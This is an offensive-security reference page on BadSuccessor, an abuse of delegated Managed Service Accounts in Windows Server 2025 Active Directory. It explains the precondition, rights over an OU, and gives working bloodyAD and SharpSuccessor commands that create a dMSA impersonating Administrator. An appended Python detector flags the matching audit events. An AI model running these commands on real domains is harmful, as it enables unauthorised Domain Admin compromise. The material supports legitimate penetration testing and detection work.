BadSuccessor (dMSA abuse)
Theory
In Windows Server 2025, Microsoft introduced delegated Managed Service Accounts (dMSAs). A dMSA is a new type of service account in Active Directory (AD) that expands on the capabilities of group Managed Service Accounts (gMSAs).
If we have GenericAll, CreateChild, WriteDACL, or WriteOwner permissions on any OU, or can modify an existing dMSA, we can escalate from low-privileged access to full Domain Admin via the BadSuccessor technique.
Exploiting this vector does not require the domain to actively use dMSAs. The feature is automatically enabled in any domain that includes at least one Windows Server 2025 domain controller, and its presence alone is enough to make the attack path viable.
Practice
NetExec (Python) can be used to enumerate whether a target is vulnerable to the BadSuccessor attack.
netexec ldap $DC_IP -u $USER -p $PASSWORD -M badsuccessor
We can then exploit it using bloodyAD (Python).
# Enumerate writable attributes for the user we are authenticating as
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN get writable --detail
# BadSuccessor attack to create the dMSA object called dmsa_pwn
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN add badSuccessor dmsa_pwn
You can use the Get-BadSuccessorOUPermissions.ps1 script to identify whether a target is vulnerable to the BadSuccessor attack.
.\Get-BadSuccessorOUPermissions.ps1
SharpSuccessor (C#) can then be used to exploit it.
# /path: The OU that the user has access to
# /account: Account that has enough permissions on the OU
# /name: Name of the dMSA object that will be created
.\SharpSuccessor.exe add /path:"ou=badOU,dc=domain,dc=local" /account:$USERNAME /name:dmsa_pwned /impersonate:Administrator
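From the defender's side, the two directory changes that characterise this technique (a dMSA object being created, then its predecessor link being pointed at a privileged account) both surface in AD object-audit events. The following is an added example, not code from the page or from any of the tools above: a small detector over parsed Security-log records. It assumes the standard event IDs 5137 (object created) and 5136 (object modified), uses the class name msDS-DelegatedManagedServiceAccount and the attribute name msDS-ManagedAccountPrecededByLink (verify both against your schema), and the dict layout of the records is a constructed, simplified rendering of the real event fields.

```python
# Added example (not from the page): flag the directory changes that characterise
# BadSuccessor in parsed Security-log events. 5137 (object created) and 5136
# (object modified) are the standard AD object-audit event IDs; the dict keys
# below are a constructed, simplified rendering of their fields.
from dataclasses import dataclass

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
# Attribute that links a dMSA to the account it "succeeds"; writing it is the
# core of the technique. Assumed name, verify it against your schema.
SUCCESSOR_ATTR = "msDS-ManagedAccountPrecededByLink"

@dataclass
class Alert:
    event_id: int
    subject: str
    target_dn: str
    reason: str

def detect_badsuccessor(events, allowed_subjects):
    """Return Alerts for dMSA creations and successor-link writes that were
    not performed by an allow-listed principal (e.g. your provisioning account)."""
    alerts = []
    for ev in events:
        subject = ev.get("SubjectUserName", "")
        if subject in allowed_subjects:
            continue
        eid = ev.get("EventID")
        if eid == 5137 and ev.get("ObjectClass") == DMSA_CLASS:
            alerts.append(Alert(eid, subject, ev["ObjectDN"],
                                "dMSA object created by non-provisioning principal"))
        elif (eid == 5136 and ev.get("ObjectClass") == DMSA_CLASS
              and ev.get("AttributeLDAPDisplayName") == SUCCESSOR_ATTR
              and ev.get("OperationType") == "Value Added"):
            alerts.append(Alert(eid, subject, ev["ObjectDN"],
                                f"{SUCCESSOR_ATTR} set to {ev.get('AttributeValue')}"))
    return alerts

# Constructed sample: a low-privileged user creates a dMSA in an OU it controls
# and links it to Administrator; a provisioning account creates a legitimate one.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "jdoe", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=dmsa_pwn,OU=badOU,DC=domain,DC=local"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=dmsa_pwn,OU=badOU,DC=domain,DC=local",
     "AttributeLDAPDisplayName": SUCCESSOR_ATTR, "OperationType": "Value Added",
     "AttributeValue": "CN=Administrator,CN=Users,DC=domain,DC=local"},
    {"EventID": 5137, "SubjectUserName": "svc_provision", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=web01-dmsa,OU=Services,DC=domain,DC=local"},
]
```

Run `detect_badsuccessor(SAMPLE_EVENTS, {"svc_provision"})` to get the two alerts for jdoe while the provisioning account's legitimate dMSA is ignored; in practice the allow-list should be the only principals expected to create dMSAs, and the OU ACL audit from Get-BadSuccessorOUPermissions.ps1 above removes the precondition rather than just detecting its use.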